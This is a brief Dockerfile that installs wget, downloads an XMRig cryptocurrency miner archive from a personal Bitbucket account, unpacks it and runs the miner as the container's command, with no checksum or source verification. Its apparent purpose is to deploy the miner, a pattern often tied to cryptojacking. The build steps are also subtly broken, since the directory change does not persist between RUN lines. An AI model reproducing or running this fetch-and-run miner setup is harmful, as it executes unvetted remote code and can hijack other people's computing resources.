FROM ubuntu:18.04
RUN apt-get update
RUN apt-get install wget -y
RUN wget https://bitbucket.org/z3rotwo000/xmrig/downloads/xmrig.tar.gz
RUN tar xf xmrig.tar.gz
RUN cd xmrig
RUN chmod u+x xmrig
CMD ./xmrig
